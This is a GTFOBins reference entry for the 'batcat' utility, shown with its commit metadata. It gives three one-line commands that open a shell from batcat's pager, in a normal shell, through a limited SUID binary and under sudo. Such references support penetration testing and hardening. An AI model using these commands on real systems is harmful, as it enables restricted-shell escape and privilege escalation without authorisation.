GTFOBins.github.io/_gtfobins/batcat.md
oush4ck f4e71b63cb
Add batcat
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-28 21:44:31 +01:00

488 B

description functions
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. `--paging always` can be omitted provided that the output doesn't fit the screen.
shell suid-limited sudo
code
batcat --paging always /etc/profile !/bin/sh
code
./batcat --paging always /etc/profile !/bin/sh
code
sudo batcat --paging always /etc/profile !/bin/sh